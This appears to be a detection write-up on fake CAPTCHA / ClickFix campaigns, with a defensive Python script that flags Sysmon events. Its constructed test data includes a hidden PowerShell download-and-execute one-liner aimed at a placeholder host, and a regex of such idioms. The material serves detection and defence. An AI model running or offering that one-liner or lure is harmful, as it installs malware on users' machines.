Analytics Story: Fake CAPTCHA Campaigns
Description
This analytic story covers Fake CAPTCHA and ClickFix campaigns, which exploit users' familiarity with verification prompts to deliver malware through clipboard manipulation. First observed in early 2024 and increasing through 2025, these campaigns present deceptive interfaces that mimic legitimate CAPTCHA systems and trick users into executing malicious commands themselves.
Why it matters
Fake CAPTCHA campaigns are a notable evolution in social engineering: they rely entirely on manipulating user behavior rather than exploiting a technical vulnerability, so patching alone does not stop them. The chain starts when a victim lands on a malicious page through a phishing email, malvertising, or a compromised legitimate site. The page presents what looks like a standard verification step, often with Google reCAPTCHA or Cloudflare branding. When the user clicks the checkbox, JavaScript on the page silently copies a command to the clipboard. The user is then told to complete "verification" by pressing Windows+R, then Ctrl+V, then Enter, which pastes the command into the Run dialog and executes it. The pasted command is typically a PowerShell (or mshta/cmd) one-liner that runs in a hidden window and downloads and executes the next stage. Common payloads include information stealers (Lumma, Redline, Vidar, PureLog), Remote Access Trojans (NetSupport, XWorm, AsyncRAT, Quasar), and multi-stage loaders that deploy several malware families from a single infection.
Because the user, not an exploit, launches the interpreter, the useful telemetry is on the endpoint: the Run dialog persists what was pasted under the RunMRU registry key, the interpreter is spawned as a child of explorer.exe, and the hidden-window process then makes an outbound connection to fetch the payload. That is why the data sources below are Sysmon process creation, registry value set, and network connection events.
Detections
Data Sources
Name | Platform | Sourcetype | Source |
---|---|---|---|
Sysmon EventID 1 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
Sysmon EventID 13 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
Sysmon EventID 3 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
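As an added example (not part of this analytic story and not Splunk's own detection content), the following Python applies the detection logic implied by the three data sources above to constructed Sysmon events: EventID 13 catches the pasted command persisted under the RunMRU key, EventID 1 catches an interpreter spawned by explorer.exe (the Run dialog's parent) with a download-and-execute command line, and EventID 3 is correlated by ProcessGuid to enrich a hit with the destination the hidden-window process contacted. The events, hostnames, IPs, SIDs and GUIDs are constructed placeholders, and the suspicious-token list is an assumption drawn from the lure behaviour described above, not a vendor rule.

```python
"""
ClickFix / fake-CAPTCHA detection logic run over constructed Sysmon events.
Added example, not Splunk's detection content; all sample values (hosts,
IPs, SIDs, GUIDs, command lines) are constructed placeholders.
"""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Interpreters a pasted Win+R one-liner typically starts (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "msiexec.exe"}

# Download-and-execute idioms plus the "I am not a robot" style trailing
# comment that lure pages append so the Run box looks like a verification.
SUSPICIOUS = re.compile(
    r"-w(indowstyle)?\s+h(idden)?\b"
    r"|\b(irm|iwr|iex|invoke-webrequest|invoke-expression|downloadstring)\b"
    r"|https?://|not a robot|captcha|verification id",
    re.IGNORECASE)

# Win+R history is written under HKCU\...\Explorer\RunMRU (Sysmon EID 13 SetValue).
RUNMRU = re.compile(r"\\Explorer\\RunMRU\\", re.IGNORECASE)


def make_event(event_id, **fields):
    """Build a minimal Sysmon-shaped XML event (constructed sample data)."""
    data = "".join(f'<Data Name="{k}">{escape(str(v))}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{data}</EventData></Event>")


def parse_event(xml_text):
    """Flatten one XmlWinEventLog Sysmon event into a dict keyed by Data Name."""
    root = ET.fromstring(xml_text)
    ev = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    ev["EventID"] = int(root.find("e:System/e:EventID", NS).text)
    return ev


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, evidence, destinations) tuples, in event order."""
    # EID 3: index outbound connections by ProcessGuid so a hit can be enriched.
    net = {}
    for ev in events:
        if ev["EventID"] == 3:
            dest = ev.get("DestinationHostname") or ev.get("DestinationIp", "")
            net.setdefault(ev.get("ProcessGuid"), []).append(f"{dest}:{ev.get('DestinationPort', '')}")

    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            # EID 1: interpreter spawned by explorer.exe (the Run dialog's parent)
            # with a download/execute command line.
            if (basename(ev.get("ParentImage", "")) == "explorer.exe"
                    and basename(ev.get("Image", "")) in INTERPRETERS
                    and SUSPICIOUS.search(ev.get("CommandLine", ""))):
                findings.append(("clickfix_process_from_run_dialog",
                                 ev["CommandLine"], net.get(ev.get("ProcessGuid"), [])))
        elif ev["EventID"] == 13:
            # EID 13: the pasted text is persisted verbatim in RunMRU (with a
            # trailing "\1"), so it survives even if the process is short-lived.
            if RUNMRU.search(ev.get("TargetObject", "")) and SUSPICIOUS.search(ev.get("Details", "")):
                findings.append(("clickfix_runmru_entry", ev["Details"], []))
    return findings


def sample_events():
    """Constructed events: one ClickFix chain plus two benign look-alikes."""
    cmd = ('powershell -w hidden -c "iex (irm https://verify.example.invalid/v.txt)" '
           '# I am not a robot - reCAPTCHA Verification ID: 7431')
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    hive = r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    raw = [
        make_event(13, EventType="SetValue", Image=r"C:\Windows\explorer.exe",
                   TargetObject=hive + r"\a", Details=cmd + "\\1"),
        make_event(1, ProcessGuid="{guid-1}", Image=ps, CommandLine=cmd,
                   ParentImage=r"C:\Windows\explorer.exe", User="CORP\\alice"),
        make_event(3, ProcessGuid="{guid-1}", Image=ps, DestinationIp="203.0.113.10",
                   DestinationHostname="", DestinationPort=443),
        # Benign: user opened PowerShell from the Start menu (same parent, plain command line).
        make_event(1, ProcessGuid="{guid-2}", Image=ps, CommandLine="powershell.exe",
                   ParentImage=r"C:\Windows\explorer.exe", User="CORP\\alice"),
        # Benign: ordinary Run-dialog history.
        make_event(13, EventType="SetValue", Image=r"C:\Windows\explorer.exe",
                   TargetObject=hive + r"\b", Details="notepad\\1"),
    ]
    return [parse_event(x) for x in raw]


def run_sample():
    return detect(sample_events())


if __name__ == "__main__":
    for rule, evidence, dests in run_sample():
        print(rule, "|", evidence[:60], "|", dests)
```

The explorer.exe parent alone is noisy, since it also covers Start-menu launches and double-clicked shortcuts; the command-line token match is what cuts the benign launches, and the RunMRU write is the signal that specifically ties the execution to the Win+R path the lure instructs. In a real deployment the token list should be tuned against the environment's own PowerShell usage, and the EID 3 enrichment is only possible when the network event lands in the same search window as the process creation.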
References
- https://urlhaus.abuse.ch/
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
- https://reliaquest.com/blog/using-captcha-for-compromise/
- https://attack.mitre.org/techniques/T1204/001/
- https://github.com/MHaggis/ClickGrab
Source: GitHub | Version: 1